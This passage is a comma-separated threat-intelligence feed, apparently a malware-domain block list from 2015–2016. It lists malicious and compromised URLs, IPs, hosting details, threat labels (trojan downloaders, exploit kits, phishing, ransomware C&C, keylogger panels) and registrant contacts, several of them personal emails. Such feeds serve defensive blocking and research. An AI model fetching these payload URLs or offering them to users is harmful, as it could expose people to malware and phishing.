abuse@fabulous.com","33480","0","IN", +"2015/04/22_15:17","aminev.com/HSBC-BANK-STORAGE-DATA/new-secure.html","69.89.22.122","box122.bluehost.com.","Script.Exploit","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2015/04/22_15:17","broadtech.co/HSBC.BANK.STORAGE/new-document.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US", +"2015/04/22_15:17","agsteier.com/HSBC.BANK.DATA/new_secure-document.html","173.254.28.44","just44.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","aminev.com/HSBC-STORAGE_DATA/secure_document.html","69.89.22.122","box122.bluehost.com.","Script.Exploit","Registrar Abuse Contact support@bluehost.com","46606","0","US", +"2015/04/22_15:17","undefined.it/HSBC_BANK-STORAGE.DATA/new_payment_document.html","174.127.110.143","slan-550-59.anhosting.com.","Script.Exploit","-","29854","0","US", +"2015/04/22_15:17","agsteier.com/BANK_STORAGE-DATA/new.payment-document.html","173.254.28.44","just44.justhost.com.","Script.Exploit","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2015/04/22_15:17","broadtech.co/HSBC_STORAGE_DATA/payment.html","23.229.160.136","ip-23-229-160-136.ip.secureserver.net.","Script.Exploit","Jorge Signoret / jorge@signosa.com","26496","0","US", +"2015/04/22_15:17","cacl.fr/HSBC_BANK_DATA/new.secure.html","174.127.110.239","slan-550-81.anhosting.com.","Script.Exploit","boonen_thanh@hotmail.com","29854","0","US", +"2015/04/22_15:17","ajewishgift.com/HSBC_BANK_STORAGE.DATA/secure.payment-document.html","192.186.223.196","ip-192-186-223-196.ip.secureserver.net.","Script.Exploit","-","26496","0","US", +"2015/04/22_15:17","eekro.cruisingsmallship.com/oaglotogoa/pusoathuth/okexithejo/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","ptuph.barginginfrance.net/ytooglesyw/evymoftoph/leewhigroo/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","emits.iptvdeals.com/pigneglogl/psoomporso/whulsynsee/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","shovi.frost-electric-supply.com/ychoomusha/uptejawhee/eegelengic/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","iptoo.cruisingsmallship.com/cocmeepsee/nikagnypsi/hoaboogrol/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","uchyz.cruisingsmallship.com/vootukigli/shacmiwhoa/zipevelrid/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","eecky.butlerelectricsupply.com/oalseebypt/hidowodruf/phaptyrsoa/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","zyrdu.cruisingsmallship.com/vyglachaph/choawoatch/glocoaphoo/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","ixoox.csheaven.com/ytoocmefta/ythyreejyk/eeshoomoar/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","gylra.cruisingsmallship.com/talsoohaha/icoagroapt/oglaheeglo/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","oshoo.iptvdeals.com/oachudydri/theshasicm/chyshyngee/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","coaha.frenchgerlemanelectric.com/atydymulra/psoaptylty/ywhopaptyl/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","echoa.randbinternationaltravel.com/wheekresip/lesorgysoj/oasemteefu/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","ooksu.frost-electric-supply.com/sebossoode/itylseehyh/grykrostad/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","efugl.iptvdeals.com/avoamsyrga/ujecketird/fudsoonsep/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","ptool.barginginfrance.net/wadostomot/oophosagli/tipsosteen/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","ocick.frost-electric-supply.com/nasaghytho/whofydroon/glotchypiv/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","xotsa.frenchgerlemanelectric.com/apsestooxo/iwheewhosh/keckalrees/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","veksi.barginginfrance.net/oassemsoci/psolsoapsi/netsoorgaw/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","ukugl.tourstogo.us/shudsoangu/whooglagoz/isestipsep/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","greev.randbinternationaltravel.com/sheptighut/groadratoa/omedryglol/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","simpi.tourstogo.us/vodopsoopu/dumseessee/viphadeeph/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","iwhab.randbinternationaltravel.com/etuwotsols/phydretack/psyveshool/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","whabi.csheaven.com/ehetsusywh/yglegrehee/jitypsewhy/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","nonsi.csheaven.com/udoartorsa/oathampoat/uzostecmew/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","namso.butlerelectricsupply.com/yfuksajozi/phidampoas/ufykampoap/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","eroov.iptvdeals.com/wheedessyh/uptoowhooj/urognotchy/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","rawoo.barginginfrance.net/deethevoaz/upsachoaju/poastycith/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","hoawy.frost-electric-supply.com/synestyfoo/oampansoam/fetuksessu/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","wetyt.tourstogo.us/shissashee/abekekurdi/oagrusteel/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","uvidu.butlerelectricsupply.com/ephuhoawud/fodrejymta/pugnovesho/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","asham.tourstogo.us/oadirteeph/eeroaghyss/evoarsoshi/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","oakso.tourstogo.us/pheekseeku/kirystobul/exeedsoots/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","dujur.barginginfrance.net/oampimsika/foowimupho/thampoperd/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","keemy.butlerelectricsupply.com/zyrsoltoah/duftuxoxyz/epheenyzug/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","ithyk.frenchgerlemanelectric.com/cywhamsoaj/thamtampee/oodsardoon/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","vitha.csheaven.com/awygludoav/ooghooksek/puptywoamt/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","esoad.frost-electric-supply.com/psutsoshup/phastupsim/tigrystolt/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","gurde.tourstogo.us/leefoohopt/ezussoadyz/utufegheer/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","oampa.csheaven.com/ovoamegloa/ishoodooho/whetcheeng/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","acool.csheaven.com/okoassetch/buweegnogr/ereedrimtu/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","phoaz.cruisingsmallship.com/thymuksate/ysigorguru/stogroaryf/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","oshoa.iptvdeals.com/whoagrofta/shaphygyft/oomtyrtogl/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","psooz.tourstogo.us/joacumupty/yduhoalrow/ooksyfoogl/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","oolsi.frost-electric-supply.com/eerutsuleh/oamteejigl/shogrodroo/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","kulro.csheaven.com/dersyphalr/kyjorsoalt/rywoarsoaz/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","eeroo.frost-electric-supply.com/phoagnonga/oshuzoathu/anunserogy/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","gyboo.cruisingsmallship.com/phyckyhert/oaltesteef/ptoneewhis/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","rumog.frost-electric-supply.com/ooxyphuxoa/oodrirolta/javyphepti/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","veevu.tourstogo.us/yxampoavoo/psopansoom/ithexoakib/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","eetho.cruisingsmallship.com/fustochoox/areltussen/hoogroxuga/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","oojee.barginginfrance.net/poovajywhi/ooghovelee/madroompob/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","igoby.frost-electric-supply.com/eesefteeps/ookeestool/meefeleezu/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","upsoj.iptvdeals.com/doaryruptu/uroassulah/foomosoglo/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","oosee.barginginfrance.net/buksyngems/boofoostiw/orignujonu/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","oawoo.frenchgerlemanelectric.com/utyfatheex/nurirsoaja/rojingaroo/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","whave.iptvdeals.com/panoowyxoz/oazicmitov/ptampordap/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","kyrsu.frost-electric-supply.com/wowoathept/grishamesa/weemoseevo/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","mocka.frost-electric-supply.com/zarseehetu/igaksuxals/kyroalopsa/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","pulso.butlerelectricsupply.com/uthoachugr/uceerdyhap/ochadikist/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","nefib.tourstogo.us/shoampakre/igoawootsi/greengeeku/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","oapsa.tourstogo.us/looreeneps/yshoobeeje/syshyshogo/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","azoos.csheaven.com/eechoawoap/rissupsuns/bigleeptuf/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","ptush.iptvdeals.com/oapsoadoov/vooglebopo/oasoardexy/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","zibup.csheaven.com/ypsoophoov/ptycmympub/teezukedoo/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","atyss.barginginfrance.net/aseerteert/ootoorezav/olaweersyb/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","ptewh.iptvdeals.com/foogloajuc/eeshedyfon/yvookrynso/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","igroo.barginginfrance.net/ogroatashy/osynoonsax/ydumtixivy/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","oofuv.cruisingsmallship.com/oozughoars/psoakraghi/oawygroors/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","pigra.csheaven.com/eveebichoa/xygyrtoolt/ooholtoaka/files/","46.30.42.74","veronikalife.ru.","VBS.Trojan.Downloader","-","35415","0","RU", +"2015/04/22_15:17","dofeb.frenchgerlemanelectric.com/iglejimoar/upsudypooz/leepeegrah/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","igagh.tourstogo.us/chogoajeep/uhozyngako/iphoasteer/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","estoa.frost-electric-supply.com/ukoatiptyv/upseeboapo/ufekyckaft/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","ubike.tourstogo.us/lussoaglee/raxadsunyx/oatchingoa/files/","176.31.28.226","-","VBS.Trojan.Downloader","Inna Reznik / inna@randbinternationaltravel.com","16276","0","FR", +"2015/04/22_15:17","boogu.barginginfrance.net/peehejoaty/avugnemtee/hibygnoars/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/22_15:17","oowhe.frost-electric-supply.com/ejisoozach/esisseeloo/oajilitsof/files/","93.170.123.186","programmerworld.ru.","VBS.Trojan.Downloader","-","29182","0","CZ", +"2015/04/22_15:17","nugly.barginginfrance.net/oogamtoafo/eestathici/athiphisik/files/","176.31.28.226","-","VBS.Trojan.Downloader","-","16276","0","FR", +"2015/04/24_19:11","www.thesparkmachine.com/Antivirus.zip","208.113.197.192","apache2-emu.paulding.dreamhost.com.","FakeAV","Registrar Abuse Contact abuse@web.com","26347","0","US", +"2015/05/11_10:05","www.motivacionyrelajacion.com/Z0H24k7E6A/","50.62.31.207","ip-50-62-31-207.ip.secureserver.net.","trojan","-","26496","0","US", +"2015/05/12_19:41","executivecoaching.co.il/IsKgVrtvQ/","109.226.10.37","-","trojan","-","50463","0","IL", +"2015/06/02_07:16","www.volleyball-doppeldorf.de/templates/blau_weiss/n8jh3wbr.php?id=60716163","37.218.254.115","c15.webspace-verkauf.de.","iframe on compromised site leads to exploit kit","info@webspace-verkauf.de","45031","0","DE", +"2015/06/02_07:16","winsetupcostotome.easthamvacations.info/answered-polynomial-eccentricity-unserviceable/029287718218614814","94.242.198.222","ip-static-94-242-198-222.server.lu.","exploit kit","Martie Cunningham / firetower@capecod.net","5577","0","LU", +"2015/06/29_16:20","lifescience.sysu.edu.cn/filees/guuu16pesche.asp","202.116.65.35","lifescience.sysu.edu.cn.","Leads to exploit","-","4538","0","CN", +"2015/07/20_18:46","atlcourier.com/wp-content/plugins/cached_data/k1.exe","72.52.170.149","host.betterwphosting.com.","Trojan.P0ny","Registrant GCROSS@ATLCOURIER.COM","32244","0","US", +"2015/07/20_18:46","www.mondoperaio.net/wp-content/plugins/cached_data/k1.exe","62.149.144.66","webx544.aruba.it.","Trojan.P0ny","Registrar Abuse Contact domainabuse@tucows.com","31034","0","IT", +"2015/09/03_05:16","krsa2gno.internet-security-alert.com/0H4RuV82F4sgUoM42smmqB4doKnVprIJ/","52.10.128.168","ec2-52-10-128-168.us-west-2.compute.amazonaws.com.","Browlock.Fake.TechSupport","-","16509","0","US", +"2015/09/03_05:16","krsa2gno.todays-sweepstakes-winner.com/0H4RuV82F4sgUoM42smmqB4doKnVprIJ/","52.10.128.168","ec2-52-10-128-168.us-west-2.compute.amazonaws.com.","Browlock.Fake.TechSupport","-","16509","0","US", +"2015/09/03_05:16","krsa2gno.congrats-sweepstakes-winner.com/0H4RuV82F4sgUoM42smmqB4doKnVprIJ/","52.10.128.168","ec2-52-10-128-168.us-west-2.compute.amazonaws.com.","Browlock.Fake.TechSupport","-","16509","0","US", +"2015/09/03_05:16","krsa2gno.important-security-brower-alert.com/0H4RuV82F4sgUoM42smmqB4doKnVprIJ/","52.10.128.168","ec2-52-10-128-168.us-west-2.compute.amazonaws.com.","Browlock.Fake.TechSupport","-","16509","0","US", +"2015/09/03_05:16","krsa2gno.youre-todays-lucky-sweeps-winner.com/0H4RuV82F4sgUoM42smmqB4doKnVprIJ/","52.10.128.168","ec2-52-10-128-168.us-west-2.compute.amazonaws.com.","Browlock.Fake.TechSupport","-","16509","0","US", +"2015/09/03_21:21","ab.usageload32.com/zz/kudhg87s7882bi/mmerrorx.html?tid=x4v&os=Windows&osv=7&isp=Comcast%20Cable&browser=Firefox&ip=Firefox","184.50.238.184","a184-50-238-184.deploy.static.akamaitechnologies.com.","Browlock, Fake.TechSupport","Registrar Abuse Contact abuse@tldregistrarsolutions.com","20940","0","US", +"2015/09/06_00:08","fondazioneciampi.org/nuovo/blogs/media/ap2.php","66.36.163.207","gasco.com.sa.","Trojan.CryptoLocker.CallBack","Daniele Ciampi / dannywiz2002@hotmail.com","14265","0","US", +"2015/09/06_00:08","europe-academy.net/wp-admin/user/ap2.php","192.232.249.212","-","Trojan.CryptoLocker.CallBack","Registrant HM7FQW9YRP9K4GA@PROXY.DREAMHOST.COM","46606","0","US", +"2015/09/17_22:43","1866809.securefastserver.com/~keycodes777/x1/login.php","86.105.227.125","-","Bot.C2","Registrant info@qhoster.com","49335","0","EU", +"2015/09/26_14:56","skidki-yuga.ru/files/17448.jpg","5.101.152.85","m2.yoda.beget.ru.","PHP.RFI","-","198610","0","RU", +"2015/09/26_14:56","kfc.i.illuminationes.com/snitch?default_keyword=&referrer=&se_referrer=&source=","91.226.33.54","d6828.core-vps.lv.","Script.iFrame.TDS (via compromised sites)","Registrar Abuse Contact abuse@bizcn.com","56617","0","LV", +"2015/10/16_07:33","www.smartscan.ro","85.9.27.130","s13v.webindex.ro.","compromised site leads to exploit kit","-","5588","0","RO", +"2015/10/16_07:41","lunaticjazz.com","69.163.200.161","apache2-bongo.koechlin.dreamhost.com.","Trojan.Ramnit","Registrant jotawagner@gmail.com","26347","0","US", +"2015/10/24_03:50","-","155.133.18.117/121fjrgoneXyeia1c3v1e3e1e2w4c3e1a3j7a3z4a1f2a1a2z1a3a4e1a2ba2a1w3.exe","ptr-155.133.18.117.vmline.pl.","Trojan.Andromeda","-","197226","0","DE", +"2015/10/24_03:50","-","155.133.18.117/goldenbet403.exe","ptr-155.133.18.117.vmline.pl.","Trojan.Andromeda","-","197226","0","DE", +"2015/10/24_03:50","-","155.133.18.117/235fjrgoneXyeia1c3v1e3e1e2w4c3e1a3j7a3z4a1f2a1a2z1a3a4e1a2ba2a1w3.exe","ptr-155.133.18.117.vmline.pl.","Trojan.Andromeda","-","197226","0","DE", +"2015/10/24_03:50","-","155.133.18.117/nut50a403.exe","ptr-155.133.18.117.vmline.pl.","Trojan.Andromeda","-","197226","0","DE", +"2015/10/24_03:50","-","155.133.18.117/38yes3.exe","ptr-155.133.18.117.vmline.pl.","Trojan.Andromeda","-","197226","0","DE", +"2015/11/03_08:24","earthcontrolsys.com/abuse_report.php?issviews.com","69.50.210.69","-","Trojan.Backdoor","Registrant info@earthcontrolsys.com","18866","0","US", +"2016/01/06_15:19","-","46.30.45.39/yyo.w","vz110372.eurodir.ru.","Cryptowall ransomware","-","35415","0","RU", +"2016/01/06_15:19","-","46.30.45.39/Statement.jpg","vz110372.eurodir.ru.","Cryptowall download script","-","35415","0","RU", +"2015/11/30_10:20","www.imagerieduroc.com/","83.143.18.95","ds95.digital-network.net.","compromised site leads to EK","Registrar Abuse Contact abuse@ovh.net","34235","0","FR", +"2015/12/14_22:05","www.drteachme.com/wp-content/plugins/theme-check/misc.php","198.154.254.250","glulife.glulife.com.","trojan","Registrant ENOM@VIZMOTION.COM","46606","0","US", +"2015/12/20_11:16","eeps.me/","208.67.23.26","h155.cpanellogin.net.","ESET phishing","WhoisGuard Protected / 16c2a1b16681459e91467194536acdbf.protect@whoisguard.com","3257","0","US", +"2015/12/26_15:34","www.hitekshop.vn/login.php","112.78.2.101","mb2d101.vdrs.net.","Keybase keylogger web panel","-","45538","0","VN", +"2015/12/28_20:16","betterhomeandgardenideas.com/dbsys.php","192.185.52.247","-","Teslacrypt ransomware c&c","-","20013","0","US", +"2015/12/28_20:16","yigitakcali.com/dbsys.php","160.153.16.29","ip-160-153-16-29.ip.secureserver.net.","Teslacrypt ransomware c&c","Registrant mahoni_17@hotmail.com","26496","0","US", +"2015/12/30_19:54","healthybloodpressure.info/2uOioq.php","50.63.56.47","ip-50-63-56-47.ip.secureserver.net.","Cryptowall ransomware C&C","HEALTHYBLOODPRESSURE.INFO@domainsbyproxy.com","26496","0","US", +"2016/01/12_08:49","www.scantanzania.com/bin/img/make.html","64.202.115.199","twiga-ip5.tanzaniawebhosting.com.","phishing","Registrant scantan@raha.com","23352","0","US", +"2016/01/12_08:53","www.technix.it/","217.194.6.34","vchicken.oval.it.","compromised site leads to exploit kit","-","12637","0","IT", +"2016/01/12_08:53","www.reifen-simon.com/","176.9.198.14","static.14.198.9.176.clients.your-server.de.","compromised site leads to exploit kit","Registrar Abuse Contact abuse@vautron.de","24940","0","DE", +"2016/01/12_09:58","szinhaz.hu/","185.43.205.98","szinhaz.hu.","compromised site leads to exploit kit","-","62214","0","HU", +"2016/01/12_10:08","www.ostsee-schnack.de/","80.67.28.137","dgws10s3-1-5db.ispgateway.de.","compromised site leads to exploit kit","hostmaster@domainfactory.de","34011","0","DE", +"2016/01/13_15:10","inclusivediversity.co.uk/wp-content/upgrade/","217.199.187.192","web192.extendcp.co.uk.","Paypal Phishing (Redirect)","Sasha Scott / -","20738","0","GB", +"2016/01/18_14:18","www.rst-velbert.de/","91.184.35.130","merkur.incoweb.de.","iframe on compromised site leads to EK","support@incoweb.de","34225","0","DE", +"2016/01/18_14:18","www.gasthofpost-ebs.de/","81.169.251.136","h2402507.stratoserver.net.","iframe on compromised site leads to EK","hostmaster@serverkompetenz.de","6724","0","DE", +"2016/01/19_07:37","avppet.com/wp-includes/js/tinymce/plugins/media/Oracle_32.zip","173.254.37.144","173-254-37-144.unifiedlayer.com.","Java installation abused for installing Java malware","-","46606","0","US", +"2016/01/19_07:37","avppet.com/wp-includes/js/tinymce/plugins/media/Oracle_64.zip","173.254.37.144","173-254-37-144.unifiedlayer.com.","Java installation abused for installing Java malware","-","46606","0","US", +"2016/01/19_09:03","blog.replacemycontacts.com/","50.62.235.1","p3nlhg498c1498.shr.prod.phx3.secureserver.net.","compromised site leads to exploit kit","Registrant RTMVNDRYVP@WHOISPRIVACYPROTECT.COM","26496","0","US", +"2016/01/19_09:50","pradakomechanicals.com/","203.124.103.1","sg2nlhg500c1500.shr.prod.sin2.secureserver.net.","compromised site leads to exploit kit","-","26496","0","SG", +"2016/01/19_11:30","www.profill-smd.com/","77.55.57.113","acf113.rev.netart.pl.","compromised site leads to exploit kit","Registrar Abuse Contact abuse@netart-registrar.com","15967","0","PL", +"2016/01/20_12:33","www.areadiprova.eu/gardani/","80.247.79.174","mail.360at.net.","compromised site leads to exploit kit","NOT DISCLOSED! / -","12850","0","IT", +"2016/01/21_13:06","www.cifor.com/","213.186.33.84","basic-cdn-01.cluster003.ovh.net.","iframe on compromised site leads to EK","Registrar Abuse Contact abuse@web.com","16276","0","FR", +"2016/01/23_00:46","www.proascolcolombia.com/portal/modules/mod_banners/Imprimir_IntimacaoCTI2015-03698541.rar?cli=Cliente&/yRpBKPujKU/nNqRc6QsuO.php","190.8.176.235","bartolome.colombiahosting.com.co.","Trojan.Banload","Registrant dominios@colombiahosting.com.co","52335","0","CO", +"2016/01/23_00:46","jktdc.in/images/klb/azxvas.gif","72.55.186.8","s005.panelboxmanager.com.","Trojan.Banload","Mr. Fayaz / jktdc@aford.net","32613","0","CA", +"2016/01/23_00:46","www.proascolcolombia.com/portal/modules/mod_banners/Imprimir_IntimacaoCTI2015-03698541.rar?cli=Cliente&/yRpBKPujKU/nNqRc6QsuO.php","190.8.176.235","bartolome.colombiahosting.com.co.","Trojan.Banload","Registrant dominios@colombiahosting.com.co","52335","0","CO", +"2016/01/23_00:46","jktdc.in/images/klb/azxvas.gif","72.55.186.8","s005.panelboxmanager.com.","Trojan.Banload","Mr. Fayaz / jktdc@aford.net","32613","0","CA", +"2016/01/27_11:21","wonchangvacuum.com.my/libraries/pear/mandate.htm","103.6.196.156","datousaurus.mschosting.com.","Phishing","-","46015","0","MY", +"2016/01/27_11:21","gosciniec-paproc.pl/lib/excel/kamp.php","85.128.248.56","aon56.rev.netart.pl.","Phishing","kontakt@nazwa.pl","15967","0","PL", +"2016/01/29_07:39","deleondeos.com/img/script.php?tup1.jpg","95.105.27.11","95.105.27.11.dynamic.oktgs.ufanet.ru.","trojan","Registrar Abuse Contact Email:compliance_abuse@webnic.cc","24955","0","RU", +"2016/01/29_07:39","deleondeos.com/img/script.php?tup2.jpg","176.106.31.227","-","trojan","Registrar Abuse Contact Email:compliance_abuse@webnic.cc","52043","0","RU", +"2016/01/29_07:39","deleondeos.com/img/script.php?tup3.jpg","176.104.18.152","s-176-104-18-152.under.net.ua.","trojan","Registrar Abuse Contact Email:compliance_abuse@webnic.cc","41435","0","UA", +"2016/02/01_13:14","www.pieiron.co.uk/","146.185.29.100","www6.grakka.net.","iframe on compromised site leads to EK","Grakka Limited / -","29302","0","GB", +"2016/02/29_07:14","www.icybrand.eu/pathway/created/accelerated/mailuserlg/savealife/trwrwbejtw.zip","192.185.194.21","ns387.websitewelcome.com.","Phishing","NOT DISCLOSED! / -","20013","0","US", +"2016/02/29_07:14","www.icybrand.eu/pathway/created/accelerated/mailuserlg/savealife/trwrwbejtw/viewer.php","192.185.194.21","ns387.websitewelcome.com.","Phishing","NOT DISCLOSED! / -","20013","0","US", +"2016/02/29_13:00","www.gold-city.it/image/_vti_cnf/app/psi.exe","31.11.33.82","websn2s072.aruba.it.","trojan","-","31034","0","IT", +"2016/02/29_13:00","www.cerquasas.it/wp-admin/user/UPS_INVOICE.rar","109.168.123.112","srv-hs2-112.netsons.net.","trojan","-","5602","0","IT", +"2016/02/29_13:00","-","91.224.161.116/ftz/z64.bin","-","malware calls home","-","50673","0","NL", +"2016/02/29_13:00","-","91.224.161.116/ftz/z32.bin","-","malware calls home","-","50673","0","NL", +"2016/03/01_07:20","-","188.138.68.160/sdt/skodls/dp.exe","static-ip-188-138-68-160.inaddr.ip-pool.com.","trojan","-","8972","0","DE", +"2016/03/03_10:17","www.inevo.co.il/","212.199.114.168","mx.standingdesk.co.il.","iframe on compromised site leads to EK","-","9116","0","IL", +"2016/03/04_13:55","nevergreen.net/6ob","107.180.26.77","ip-107-180-26-77.ip.secureserver.net.","Bot","-","26496","0","US", +"2016/03/08_10:51","izzy-cars.nl/9uj8n76b5.exe","46.235.47.134","srv047134.webreus.nl.","trojan","-","34233","0","NL", +"2016/03/08_10:58","stopmeagency.free.fr/9uj8n76b5.exe","212.27.63.112","perso112-g5.free.fr.","trojan","skolaric@online.net","12322","0","FR", +"2016/03/08_10:58","reclamus.com/9uj8n76b5.exe","198.63.208.35","vserv.cifnet.com.","trojan","-","14585","0","US", +"2016/03/08_10:58","lhs-mhs.org/9uj8n76b5.exe","208.131.141.2","rageresearch.com.","trojan","Gene Mathis / gcm@gcmathis.com","29854","0","US", +"2016/03/13_14:23","-","81.169.219.64/security_check.html","h2543039.stratoserver.net.","PayPal phishing","-","6724","0","DE", 